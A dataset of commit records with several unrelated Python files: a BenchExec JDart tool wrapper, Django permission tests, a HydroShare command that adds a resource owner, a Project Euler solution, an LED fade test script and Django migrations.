This file is part of BenchExec.
Copyright (C) 2007-2018 Dirk Beyer
All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import benchexec.util as util
import benchexec.tools.template
import benchexec.result as result
class Tool(benchexec.tools.template.BaseTool):
"""
Tool info for JDart modified by TU Dortmund
(https://github.com/tudo-aqua/jdart).
"""
REQUIRED_PATHS = ["jconstraints-extensions",
"lib",
"z3",
"basic.jpf",
"jdk8u222-b10",
"jconstraints-0.9.2-SNAPSHOT.jar",
"jpf-annotations.jar",
"jpf-classes.jar",
"jpf.jar",
"jpf-jdart-annotations.jar",
"jpf-jdart-classes.jar",
"jpf-jdart.jar",
"RunJPF.jar",
"version.txt"]
def executable(self):
return util.find_executable("run-jdart.sh")
def version(self, executable):
return self._version_from_tool(executable, arg="-v")
def name(self):
return "JDart"
def cmdline(self, executable, options, tasks, propertyfile, rlimits):
cmd = [executable]
if options:
cmd = cmd + options
if propertyfile:
cmd.append(propertyfile)
return cmd + tasks
def determine_result(self, returncode, returnsignal, output, isTimeout):
# parse output
status = result.RESULT_UNKNOWN
for line in output:
if "== ERROR" in line:
status = result.RESULT_FALSE_PROP
elif "== OK" in line:
status = result.RESULT_TRUE_PROP
return status
|
|
bddb35ecbf7953c2b95f3db41fedd97199646e7b
|
yunity/tests/integration/test_permissions.py
|
yunity/tests/integration/test_permissions.py
|
from django.test import TestCase
from yunity.base.other_models import Group
from yunity.permissions.resolver import resolve_permissions
from yunity.users.models import ProfileVisibility
from yunity.utils.tests.mock import MockUser
from yunity.walls.models import Wall
class PermissionsTests(TestCase):
def setUp(self):
w = Wall.objects.create()
w2 = Wall.objects.create()
g = Group.objects.create(name='toplevel group 1')
ga = Group.objects.create(name='1a', parent=g)
gb = Group.objects.create(name='1b', parent=g)
gc = Group.objects.create(name='1c', parent=g)
gaa = Group.objects.create(name='1aa', parent=ga)
h = Group.objects.create(name='toplevel group 2')
ha = Group.objects.create(name='2a', parent=h)
hb = Group.objects.create(name='2b', parent=h)
hba = Group.objects.create(name='2ba', parent=hb)
t = gaa.hub
t.wall = w
t.save()
t = hb.hub
t.wall = w2
t.save()
def test_nothing(self):
pass
def test_user_wall_is_public_readable(self):
u = MockUser.create(profile_visibility=ProfileVisibility.PUBLIC)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.public, 'read', 'user wall not public readable')
def test_user_wall_is_community_readable_base(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='toplevel group 2').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.group_trees, [(g, 'read')], 'set of communities differs from communities user is part of')
def test_user_wall_is_community_readable_user_child(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='2ba').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
community = Group.objects.filter(name='toplevel group 2').first()
self.assertEqual(c.group_trees, [(community, 'read')], 'set of communities differs from communities user is part of')
|
Add basic permission system tests
|
Add basic permission system tests
Test some permissions on a users wall.
with @nicksellen
|
Python
|
agpl-3.0
|
yunity/yunity-core,yunity/foodsaving-backend,yunity/foodsaving-backend,yunity/foodsaving-backend,yunity/yunity-core
|
Add basic permission system tests
Test some permissions on a users wall.
with @nicksellen
|
from django.test import TestCase
from yunity.base.other_models import Group
from yunity.permissions.resolver import resolve_permissions
from yunity.users.models import ProfileVisibility
from yunity.utils.tests.mock import MockUser
from yunity.walls.models import Wall
class PermissionsTests(TestCase):
def setUp(self):
w = Wall.objects.create()
w2 = Wall.objects.create()
g = Group.objects.create(name='toplevel group 1')
ga = Group.objects.create(name='1a', parent=g)
gb = Group.objects.create(name='1b', parent=g)
gc = Group.objects.create(name='1c', parent=g)
gaa = Group.objects.create(name='1aa', parent=ga)
h = Group.objects.create(name='toplevel group 2')
ha = Group.objects.create(name='2a', parent=h)
hb = Group.objects.create(name='2b', parent=h)
hba = Group.objects.create(name='2ba', parent=hb)
t = gaa.hub
t.wall = w
t.save()
t = hb.hub
t.wall = w2
t.save()
def test_nothing(self):
pass
def test_user_wall_is_public_readable(self):
u = MockUser.create(profile_visibility=ProfileVisibility.PUBLIC)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.public, 'read', 'user wall not public readable')
def test_user_wall_is_community_readable_base(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='toplevel group 2').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.group_trees, [(g, 'read')], 'set of communities differs from communities user is part of')
def test_user_wall_is_community_readable_user_child(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='2ba').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
community = Group.objects.filter(name='toplevel group 2').first()
self.assertEqual(c.group_trees, [(community, 'read')], 'set of communities differs from communities user is part of')
|
<commit_before><commit_msg>Add basic permission system tests
Test some permissions on a users wall.
with @nicksellen<commit_after>
|
from django.test import TestCase
from yunity.base.other_models import Group
from yunity.permissions.resolver import resolve_permissions
from yunity.users.models import ProfileVisibility
from yunity.utils.tests.mock import MockUser
from yunity.walls.models import Wall
class PermissionsTests(TestCase):
def setUp(self):
w = Wall.objects.create()
w2 = Wall.objects.create()
g = Group.objects.create(name='toplevel group 1')
ga = Group.objects.create(name='1a', parent=g)
gb = Group.objects.create(name='1b', parent=g)
gc = Group.objects.create(name='1c', parent=g)
gaa = Group.objects.create(name='1aa', parent=ga)
h = Group.objects.create(name='toplevel group 2')
ha = Group.objects.create(name='2a', parent=h)
hb = Group.objects.create(name='2b', parent=h)
hba = Group.objects.create(name='2ba', parent=hb)
t = gaa.hub
t.wall = w
t.save()
t = hb.hub
t.wall = w2
t.save()
def test_nothing(self):
pass
def test_user_wall_is_public_readable(self):
u = MockUser.create(profile_visibility=ProfileVisibility.PUBLIC)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.public, 'read', 'user wall not public readable')
def test_user_wall_is_community_readable_base(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='toplevel group 2').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.group_trees, [(g, 'read')], 'set of communities differs from communities user is part of')
def test_user_wall_is_community_readable_user_child(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='2ba').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
community = Group.objects.filter(name='toplevel group 2').first()
self.assertEqual(c.group_trees, [(community, 'read')], 'set of communities differs from communities user is part of')
|
Add basic permission system tests
Test some permissions on a users wall.
with @nicksellenfrom django.test import TestCase
from yunity.base.other_models import Group
from yunity.permissions.resolver import resolve_permissions
from yunity.users.models import ProfileVisibility
from yunity.utils.tests.mock import MockUser
from yunity.walls.models import Wall
class PermissionsTests(TestCase):
def setUp(self):
w = Wall.objects.create()
w2 = Wall.objects.create()
g = Group.objects.create(name='toplevel group 1')
ga = Group.objects.create(name='1a', parent=g)
gb = Group.objects.create(name='1b', parent=g)
gc = Group.objects.create(name='1c', parent=g)
gaa = Group.objects.create(name='1aa', parent=ga)
h = Group.objects.create(name='toplevel group 2')
ha = Group.objects.create(name='2a', parent=h)
hb = Group.objects.create(name='2b', parent=h)
hba = Group.objects.create(name='2ba', parent=hb)
t = gaa.hub
t.wall = w
t.save()
t = hb.hub
t.wall = w2
t.save()
def test_nothing(self):
pass
def test_user_wall_is_public_readable(self):
u = MockUser.create(profile_visibility=ProfileVisibility.PUBLIC)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.public, 'read', 'user wall not public readable')
def test_user_wall_is_community_readable_base(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='toplevel group 2').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.group_trees, [(g, 'read')], 'set of communities differs from communities user is part of')
def test_user_wall_is_community_readable_user_child(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='2ba').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
community = Group.objects.filter(name='toplevel group 2').first()
self.assertEqual(c.group_trees, [(community, 'read')], 'set of communities differs from communities user is part of')
|
<commit_before><commit_msg>Add basic permission system tests
Test some permissions on a users wall.
with @nicksellen<commit_after>from django.test import TestCase
from yunity.base.other_models import Group
from yunity.permissions.resolver import resolve_permissions
from yunity.users.models import ProfileVisibility
from yunity.utils.tests.mock import MockUser
from yunity.walls.models import Wall
class PermissionsTests(TestCase):
def setUp(self):
w = Wall.objects.create()
w2 = Wall.objects.create()
g = Group.objects.create(name='toplevel group 1')
ga = Group.objects.create(name='1a', parent=g)
gb = Group.objects.create(name='1b', parent=g)
gc = Group.objects.create(name='1c', parent=g)
gaa = Group.objects.create(name='1aa', parent=ga)
h = Group.objects.create(name='toplevel group 2')
ha = Group.objects.create(name='2a', parent=h)
hb = Group.objects.create(name='2b', parent=h)
hba = Group.objects.create(name='2ba', parent=hb)
t = gaa.hub
t.wall = w
t.save()
t = hb.hub
t.wall = w2
t.save()
def test_nothing(self):
pass
def test_user_wall_is_public_readable(self):
u = MockUser.create(profile_visibility=ProfileVisibility.PUBLIC)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.public, 'read', 'user wall not public readable')
def test_user_wall_is_community_readable_base(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='toplevel group 2').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.group_trees, [(g, 'read')], 'set of communities differs from communities user is part of')
def test_user_wall_is_community_readable_user_child(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='2ba').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
community = Group.objects.filter(name='toplevel group 2').first()
self.assertEqual(c.group_trees, [(community, 'read')], 'set of communities differs from communities user is part of')
|
|
6ecb2fc93c183e7a2c6574de25cf3d0a2fe66fe7
|
hs_core/management/commands/add_owner.py
|
hs_core/management/commands/add_owner.py
|
""" Add an owner to a resource or resources
"""
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
from hs_core.hydroshare.utils import get_resource_by_shortkey
from hs_access_control.models.privilege import UserResourcePrivilege, PrivilegeCodes
class Command(BaseCommand):
help = "add owner to resource"
def add_arguments(self, parser):
parser.add_argument('new_owner', type=str)
# a list of resource id's: none does nothing.
parser.add_argument('resource_ids', nargs='*', type=str)
def handle(self, *args, **options):
user = User.objects.get(username=options['new_owner'])
admin = User.objects.get(username='admin')
if len(options['resource_ids']) > 0: # an array of resource short_id to check.
for rid in options['resource_ids']:
resource = get_resource_by_shortkey(rid)
UserResourcePrivilege.share(user=user,
resource=resource,
privilege=PrivilegeCodes.OWNER,
grantor=admin)
else:
print("No resource list specified.")
|
Add an owner to an existing resource.
|
Add an owner to an existing resource.
|
Python
|
bsd-3-clause
|
hydroshare/hydroshare,hydroshare/hydroshare,hydroshare/hydroshare,hydroshare/hydroshare,hydroshare/hydroshare
|
Add an owner to an existing resource.
|
""" Add an owner to a resource or resources
"""
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
from hs_core.hydroshare.utils import get_resource_by_shortkey
from hs_access_control.models.privilege import UserResourcePrivilege, PrivilegeCodes
class Command(BaseCommand):
help = "add owner to resource"
def add_arguments(self, parser):
parser.add_argument('new_owner', type=str)
# a list of resource id's: none does nothing.
parser.add_argument('resource_ids', nargs='*', type=str)
def handle(self, *args, **options):
user = User.objects.get(username=options['new_owner'])
admin = User.objects.get(username='admin')
if len(options['resource_ids']) > 0: # an array of resource short_id to check.
for rid in options['resource_ids']:
resource = get_resource_by_shortkey(rid)
UserResourcePrivilege.share(user=user,
resource=resource,
privilege=PrivilegeCodes.OWNER,
grantor=admin)
else:
print("No resource list specified.")
|
<commit_before><commit_msg>Add an owner to an existing resource.<commit_after>
|
""" Add an owner to a resource or resources
"""
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
from hs_core.hydroshare.utils import get_resource_by_shortkey
from hs_access_control.models.privilege import UserResourcePrivilege, PrivilegeCodes
class Command(BaseCommand):
help = "add owner to resource"
def add_arguments(self, parser):
parser.add_argument('new_owner', type=str)
# a list of resource id's: none does nothing.
parser.add_argument('resource_ids', nargs='*', type=str)
def handle(self, *args, **options):
user = User.objects.get(username=options['new_owner'])
admin = User.objects.get(username='admin')
if len(options['resource_ids']) > 0: # an array of resource short_id to check.
for rid in options['resource_ids']:
resource = get_resource_by_shortkey(rid)
UserResourcePrivilege.share(user=user,
resource=resource,
privilege=PrivilegeCodes.OWNER,
grantor=admin)
else:
print("No resource list specified.")
|
Add an owner to an existing resource.""" Add an owner to a resource or resources
"""
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
from hs_core.hydroshare.utils import get_resource_by_shortkey
from hs_access_control.models.privilege import UserResourcePrivilege, PrivilegeCodes
class Command(BaseCommand):
help = "add owner to resource"
def add_arguments(self, parser):
parser.add_argument('new_owner', type=str)
# a list of resource id's: none does nothing.
parser.add_argument('resource_ids', nargs='*', type=str)
def handle(self, *args, **options):
user = User.objects.get(username=options['new_owner'])
admin = User.objects.get(username='admin')
if len(options['resource_ids']) > 0: # an array of resource short_id to check.
for rid in options['resource_ids']:
resource = get_resource_by_shortkey(rid)
UserResourcePrivilege.share(user=user,
resource=resource,
privilege=PrivilegeCodes.OWNER,
grantor=admin)
else:
print("No resource list specified.")
|
<commit_before><commit_msg>Add an owner to an existing resource.<commit_after>""" Add an owner to a resource or resources
"""
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
from hs_core.hydroshare.utils import get_resource_by_shortkey
from hs_access_control.models.privilege import UserResourcePrivilege, PrivilegeCodes
class Command(BaseCommand):
help = "add owner to resource"
def add_arguments(self, parser):
parser.add_argument('new_owner', type=str)
# a list of resource id's: none does nothing.
parser.add_argument('resource_ids', nargs='*', type=str)
def handle(self, *args, **options):
user = User.objects.get(username=options['new_owner'])
admin = User.objects.get(username='admin')
if len(options['resource_ids']) > 0: # an array of resource short_id to check.
for rid in options['resource_ids']:
resource = get_resource_by_shortkey(rid)
UserResourcePrivilege.share(user=user,
resource=resource,
privilege=PrivilegeCodes.OWNER,
grantor=admin)
else:
print("No resource list specified.")
|
|
bf3a54c07deea9285e92339e40ae140d51d1ce67
|
euler032.py
|
euler032.py
|
#!/usr/bin/python
from functools import reduce
from math import sqrt
pan_set = set()
for i in range(1000, 9999):
for j in range(2, int(sqrt(i)) + 1):
if j * (i // j) == i:
if len(set(str(j) + str(i // j) + str(i)) - set('0')) == 9:
pan_set.add(i)
print(sum(pan_set))
|
Add solution for problem 32
|
Add solution for problem 32
This is an optimized solution, with some hint from Euler forum, after
solved with a slow brute algorith using permutation (see 24). BTW, with
some analisys is possible to reduce the searching space
|
Python
|
mit
|
cifvts/PyEuler
|
Add solution for problem 32
This is an optimized solution, with some hint from Euler forum, after
solved with a slow brute algorith using permutation (see 24). BTW, with
some analisys is possible to reduce the searching space
|
#!/usr/bin/python
from functools import reduce
from math import sqrt
pan_set = set()
for i in range(1000, 9999):
for j in range(2, int(sqrt(i)) + 1):
if j * (i // j) == i:
if len(set(str(j) + str(i // j) + str(i)) - set('0')) == 9:
pan_set.add(i)
print(sum(pan_set))
|
<commit_before><commit_msg>Add solution for problem 32
This is an optimized solution, with some hint from Euler forum, after
solved with a slow brute algorith using permutation (see 24). BTW, with
some analisys is possible to reduce the searching space<commit_after>
|
#!/usr/bin/python
from functools import reduce
from math import sqrt
pan_set = set()
for i in range(1000, 9999):
for j in range(2, int(sqrt(i)) + 1):
if j * (i // j) == i:
if len(set(str(j) + str(i // j) + str(i)) - set('0')) == 9:
pan_set.add(i)
print(sum(pan_set))
|
Add solution for problem 32
This is an optimized solution, with some hint from Euler forum, after
solved with a slow brute algorith using permutation (see 24). BTW, with
some analisys is possible to reduce the searching space#!/usr/bin/python
from functools import reduce
from math import sqrt
pan_set = set()
for i in range(1000, 9999):
for j in range(2, int(sqrt(i)) + 1):
if j * (i // j) == i:
if len(set(str(j) + str(i // j) + str(i)) - set('0')) == 9:
pan_set.add(i)
print(sum(pan_set))
|
<commit_before><commit_msg>Add solution for problem 32
This is an optimized solution, with some hint from Euler forum, after
solved with a slow brute algorith using permutation (see 24). BTW, with
some analisys is possible to reduce the searching space<commit_after>#!/usr/bin/python
from functools import reduce
from math import sqrt
pan_set = set()
for i in range(1000, 9999):
for j in range(2, int(sqrt(i)) + 1):
if j * (i // j) == i:
if len(set(str(j) + str(i // j) + str(i)) - set('0')) == 9:
pan_set.add(i)
print(sum(pan_set))
|
|
b6a85378d210dc3954a43f25c855ca20f68972b3
|
software/dev/fade_pat.py
|
software/dev/fade_pat.py
|
#!/usr/bin/python
import os
import sys
import math
from colorsys import hsv_to_rgb
from hippietrap.chandelier import Chandelier, BROADCAST, NUM_NODES
from hippietrap.color import Color
from time import sleep, time
from random import random
STEPS = 5000
device = "/dev/serial0"
ch = Chandelier()
ch.open(device)
ch.clear(BROADCAST)
ch.set_color(BROADCAST, Color(0, 0, 0))
print "to red"
ch.send_fade(BROADCAST, 3000, (Color(255, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to green"
ch.send_fade(BROADCAST, 3000, (Color(0, 255, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to blue"
ch.send_fade(BROADCAST, 3000, (Color(0, 0, 255), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to off"
ch.send_fade(BROADCAST, 3000, (Color(10, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
|
Add test script for fade pattern
|
Add test script for fade pattern
|
Python
|
mit
|
mayhem/led-chandelier,mayhem/led-chandelier,mayhem/led-chandelier
|
Add test script for fade pattern
|
#!/usr/bin/python
import os
import sys
import math
from colorsys import hsv_to_rgb
from hippietrap.chandelier import Chandelier, BROADCAST, NUM_NODES
from hippietrap.color import Color
from time import sleep, time
from random import random
STEPS = 5000
device = "/dev/serial0"
ch = Chandelier()
ch.open(device)
ch.clear(BROADCAST)
ch.set_color(BROADCAST, Color(0, 0, 0))
print "to red"
ch.send_fade(BROADCAST, 3000, (Color(255, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to green"
ch.send_fade(BROADCAST, 3000, (Color(0, 255, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to blue"
ch.send_fade(BROADCAST, 3000, (Color(0, 0, 255), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to off"
ch.send_fade(BROADCAST, 3000, (Color(10, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
|
<commit_before><commit_msg>Add test script for fade pattern<commit_after>
|
#!/usr/bin/python
import os
import sys
import math
from colorsys import hsv_to_rgb
from hippietrap.chandelier import Chandelier, BROADCAST, NUM_NODES
from hippietrap.color import Color
from time import sleep, time
from random import random
STEPS = 5000
device = "/dev/serial0"
ch = Chandelier()
ch.open(device)
ch.clear(BROADCAST)
ch.set_color(BROADCAST, Color(0, 0, 0))
print "to red"
ch.send_fade(BROADCAST, 3000, (Color(255, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to green"
ch.send_fade(BROADCAST, 3000, (Color(0, 255, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to blue"
ch.send_fade(BROADCAST, 3000, (Color(0, 0, 255), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to off"
ch.send_fade(BROADCAST, 3000, (Color(10, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
|
Add test script for fade pattern#!/usr/bin/python
import os
import sys
import math
from colorsys import hsv_to_rgb
from hippietrap.chandelier import Chandelier, BROADCAST, NUM_NODES
from hippietrap.color import Color
from time import sleep, time
from random import random
STEPS = 5000
device = "/dev/serial0"
ch = Chandelier()
ch.open(device)
ch.clear(BROADCAST)
ch.set_color(BROADCAST, Color(0, 0, 0))
print "to red"
ch.send_fade(BROADCAST, 3000, (Color(255, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to green"
ch.send_fade(BROADCAST, 3000, (Color(0, 255, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to blue"
ch.send_fade(BROADCAST, 3000, (Color(0, 0, 255), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to off"
ch.send_fade(BROADCAST, 3000, (Color(10, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
|
<commit_before><commit_msg>Add test script for fade pattern<commit_after>#!/usr/bin/python
import os
import sys
import math
from colorsys import hsv_to_rgb
from hippietrap.chandelier import Chandelier, BROADCAST, NUM_NODES
from hippietrap.color import Color
from time import sleep, time
from random import random
STEPS = 5000
device = "/dev/serial0"
ch = Chandelier()
ch.open(device)
ch.clear(BROADCAST)
ch.set_color(BROADCAST, Color(0, 0, 0))
print "to red"
ch.send_fade(BROADCAST, 3000, (Color(255, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to green"
ch.send_fade(BROADCAST, 3000, (Color(0, 255, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to blue"
ch.send_fade(BROADCAST, 3000, (Color(0, 0, 255), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to off"
ch.send_fade(BROADCAST, 3000, (Color(10, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
|
|
0c689031a2252a460c3420f99bad14f83eb751d2
|
mla_game/apps/transcript/migrations/0016_auto_20171027_1844.py
|
mla_game/apps/transcript/migrations/0016_auto_20171027_1844.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-10-27 18:44
from __future__ import unicode_literals
from django.db import migrations
def create_votes(apps, schema_editor):
Profile = apps.get_model(
'accounts', 'Profile'
)
TranscriptPhraseVote = apps.get_model(
'transcript', 'TranscriptPhraseVote'
)
for profile in Profile.objects.all():
phrases = profile.considered_phrases.all()
for phrase in phrases:
if TranscriptPhraseVote.objects.filter(
transcript_phrase=phrase, user=profile.user
).count() == 0:
vote = TranscriptPhraseVote(
transcript_phrase=phrase,
user=profile.user,
upvote=True
)
vote.save()
class Migration(migrations.Migration):
dependencies = [
('transcript', '0015_auto_20171027_1252'),
]
operations = [
migrations.RunPython(create_votes)
]
|
Convert un-downvoted considered phrases to upvotes
|
Convert un-downvoted considered phrases to upvotes
|
Python
|
mit
|
WGBH/FixIt,WGBH/FixIt,WGBH/FixIt
|
Convert un-downvoted considered phrases to upvotes
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-10-27 18:44
from __future__ import unicode_literals
from django.db import migrations
def create_votes(apps, schema_editor):
Profile = apps.get_model(
'accounts', 'Profile'
)
TranscriptPhraseVote = apps.get_model(
'transcript', 'TranscriptPhraseVote'
)
for profile in Profile.objects.all():
phrases = profile.considered_phrases.all()
for phrase in phrases:
if TranscriptPhraseVote.objects.filter(
transcript_phrase=phrase, user=profile.user
).count() == 0:
vote = TranscriptPhraseVote(
transcript_phrase=phrase,
user=profile.user,
upvote=True
)
vote.save()
class Migration(migrations.Migration):
dependencies = [
('transcript', '0015_auto_20171027_1252'),
]
operations = [
migrations.RunPython(create_votes)
]
|
<commit_before><commit_msg>Convert un-downvoted considered phrases to upvotes<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-10-27 18:44
from __future__ import unicode_literals
from django.db import migrations
def create_votes(apps, schema_editor):
Profile = apps.get_model(
'accounts', 'Profile'
)
TranscriptPhraseVote = apps.get_model(
'transcript', 'TranscriptPhraseVote'
)
for profile in Profile.objects.all():
phrases = profile.considered_phrases.all()
for phrase in phrases:
if TranscriptPhraseVote.objects.filter(
transcript_phrase=phrase, user=profile.user
).count() == 0:
vote = TranscriptPhraseVote(
transcript_phrase=phrase,
user=profile.user,
upvote=True
)
vote.save()
class Migration(migrations.Migration):
dependencies = [
('transcript', '0015_auto_20171027_1252'),
]
operations = [
migrations.RunPython(create_votes)
]
|
Convert un-downvoted considered phrases to upvotes# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-10-27 18:44
from __future__ import unicode_literals
from django.db import migrations
def create_votes(apps, schema_editor):
Profile = apps.get_model(
'accounts', 'Profile'
)
TranscriptPhraseVote = apps.get_model(
'transcript', 'TranscriptPhraseVote'
)
for profile in Profile.objects.all():
phrases = profile.considered_phrases.all()
for phrase in phrases:
if TranscriptPhraseVote.objects.filter(
transcript_phrase=phrase, user=profile.user
).count() == 0:
vote = TranscriptPhraseVote(
transcript_phrase=phrase,
user=profile.user,
upvote=True
)
vote.save()
class Migration(migrations.Migration):
dependencies = [
('transcript', '0015_auto_20171027_1252'),
]
operations = [
migrations.RunPython(create_votes)
]
|
<commit_before><commit_msg>Convert un-downvoted considered phrases to upvotes<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-10-27 18:44
from __future__ import unicode_literals
from django.db import migrations
def create_votes(apps, schema_editor):
Profile = apps.get_model(
'accounts', 'Profile'
)
TranscriptPhraseVote = apps.get_model(
'transcript', 'TranscriptPhraseVote'
)
for profile in Profile.objects.all():
phrases = profile.considered_phrases.all()
for phrase in phrases:
if TranscriptPhraseVote.objects.filter(
transcript_phrase=phrase, user=profile.user
).count() == 0:
vote = TranscriptPhraseVote(
transcript_phrase=phrase,
user=profile.user,
upvote=True
)
vote.save()
class Migration(migrations.Migration):
dependencies = [
('transcript', '0015_auto_20171027_1252'),
]
operations = [
migrations.RunPython(create_votes)
]
|
|
01df9e651fff0d7619dc8bbe5b353ca050b2d966
|
bluebottle/tasks/migrations/0007_auto_20160720_1139.py
|
bluebottle/tasks/migrations/0007_auto_20160720_1139.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-20 09:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tasks', '0006_auto_20160720_1058'),
]
operations = [
migrations.AlterField(
model_name='task',
name='type',
field=models.CharField(choices=[(b'ongoing', 'Ongoing (with deadline)'), (b'event', 'Event (on set date)')], default=b'ongoing', max_length=20, verbose_name='type'),
),
]
|
Change description for task types
|
Change description for task types
|
Python
|
bsd-3-clause
|
onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle
|
Change description for task types
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-20 09:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tasks', '0006_auto_20160720_1058'),
]
operations = [
migrations.AlterField(
model_name='task',
name='type',
field=models.CharField(choices=[(b'ongoing', 'Ongoing (with deadline)'), (b'event', 'Event (on set date)')], default=b'ongoing', max_length=20, verbose_name='type'),
),
]
|
<commit_before><commit_msg>Change description for task types<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-20 09:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tasks', '0006_auto_20160720_1058'),
]
operations = [
migrations.AlterField(
model_name='task',
name='type',
field=models.CharField(choices=[(b'ongoing', 'Ongoing (with deadline)'), (b'event', 'Event (on set date)')], default=b'ongoing', max_length=20, verbose_name='type'),
),
]
|
Change description for task types# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-20 09:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tasks', '0006_auto_20160720_1058'),
]
operations = [
migrations.AlterField(
model_name='task',
name='type',
field=models.CharField(choices=[(b'ongoing', 'Ongoing (with deadline)'), (b'event', 'Event (on set date)')], default=b'ongoing', max_length=20, verbose_name='type'),
),
]
|
<commit_before><commit_msg>Change description for task types<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-20 09:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
